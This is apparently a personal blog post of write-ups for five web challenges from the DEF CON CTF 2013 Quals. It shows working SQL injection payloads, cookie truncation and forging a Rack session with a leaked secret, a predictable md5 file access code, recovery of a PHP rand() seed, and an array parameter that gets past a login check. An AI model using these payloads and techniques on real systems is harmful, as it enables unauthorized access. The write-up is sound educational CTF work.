... back to the original entry ... ... leave a comment feel free to write English comment in the Polish-comment section ... DEF CON CTF 2013 Quals - web writeups
I haven't played in a lot of CTF games. I just used to register at random nickname, take a look at kinda interesting web-challenges and tried to solve them in a short period of time. It was like CTF
blitz. However, I decided to give playing CTFs a try. I've joined new team and challenged
DEF CON CTF (ofc, only in a web category). Here's my short (published just after competitions' end) writeups for web-challenges (called also 3dub).
babysfirst
It's just an easy SQL Injection (on SQLite database). We could use sqlite_master to get table and column names:
username=' or 1=1 union select sql from sqlite_master WHERE type='table'-- |
logged in as CREATE TABLE keys (value string) |
And here's the way to get the flag:
username=' or 1=1 union select value from keys-- |
The key is: literally online lolling on line WucGesJi |
badmedicine
We are able to log as everyone, except
admin. Every signing in attempt creates new cookie (which is dependent on choosen login). One nickname's letter sets two cookie's characters. We shoudn't even try to guess the way, used to creating these cookies. Much faster idea is to log in as
adminX, which gives us new cookie: username=
09c8259ca076. All we have to do is just removing last two characters from it (which suits to the letter
X).
Using username=
09c8259ca0 cookie gives us the flag:
The key is: who wants oatmeal raisin anyways twumpAdby |
hypeman
While trying to get admin's secret (/secrets/0) the error page is displayed. Let's take a look at it:
rack.session.options
{
:path=>"/",
:domain=>nil,
:expire_after=>nil,
:secure=>false,
:httponly=>true,
:defer=>false,
:renew=>false,
:sidbits=>128,
:secure_random=>SecureRandom,
:secret=>"wroashsoxDiculReejLykUssyifabEdGhovHabno",
:coder=>#<Rack::Session::Cookie::Base64::Marshal:0x000000034e2228>
}
rack.session.unpacked_cookie_data
{
"session_id"=>"6ef1fd11f31860a44f2846c776492c72a3c6ab7233e27ec2c64f8d8ccb9420b4",
"tracking"=>
{
"HTTP_USER_AGENT"=>"50767cb0bf2f1f10587db0e2eb5a1e32d0c887fd",
"HTTP_ACCEPT_ENCODING"=>"a0bfc876d68fe7aea700da5ea8925abac6f2f794",
"HTTP_ACCEPT_LANGUAGE"=>"e88e52a62f706f3c0ae7d4caaf8925434a837c9f"},
"csrf"=>"b688a1219c420e329efb59dfc33c111845d04641cfd140a32935e684ec722ab8",
"user_name"=>"xxxxxxxxx"
}
} |
We just need to set up own
Sinatra server, create new admin cookie and sign it (we know the value of
:secret).
enable :sessions
set :session_secret, "wroashsoxDiculReejLykUssyifabEdGhovHabno"
session[:user_name] = 'admin'
session[:csrf] = "b688a1219c420e329efb59dfc33c111845d04641cfd140a32935e684ec722ab8" |
Little cookie tampering and the flag is ours!:
watch out for this Etdeksogav |
rememberme
It's easy to spot, that md5('usernames.txt') = 60635c6862d44e8ac17dc5e144c66539.
Now, we could super-easily get access to other files. As
passwords.txt looks like honeypot, we should forget about it and check
genfile.php.
getfile.php?filename=getfile.php&accesscode=md5('getfile.php')
getfile.php?filename=getfile.php&accesscode=0701593e23e676eaba834916a6ac7272 |
The source gives us the information, that filekey.txt exists
getfile.php?filename=key.txt&accesscode=65c2a527098e1f7747eec58e1925b453 |
Next lines of code reveal how to gain the key hidden in key.txt
$value = time();
/* --- cut --- */
srand($value);
/* --- cut --- */
$key = rand();
$cyphertext = mcrypt_encrypt(MCRYPT_RIJNDAEL_128, $key, $data, MCRYPT_MODE_CBC); |
That's all we need. We got ciphered text, which we have to decipher (it is what
key.txt displays) and we also know the key.
The value of the key - due to
srand() - could be easily recreated. The constant seed makes
rand() to return the same result, everytime it's called. Morover, our seed is
time(). The value of
time() is known ('cos we are able to check when the request to display
key.txt content had been sent. However, if we coudn't get the exact value of it, we could easily brute-force small key-space nearby
time() value).
The next step is just
mcrypt_decrypt() which reveals the flag:
To boldly go where no one has gone before WMx8reNS |
worsemedicine
The fastest points ever. We are able to login as everyone except admin.
Instead of sending requestes like that:
_utf8=%26%23x2713%3B&verification=7734c700&username=admin&password= |
we should "cheat" the challenge with this one:
_utf8=%26%23x2713%3B&verification=7734c700&username[]=admin&password= |
Voila!
The key is: computers downtown and computers up in harlem |
Yeah, web category is cleared!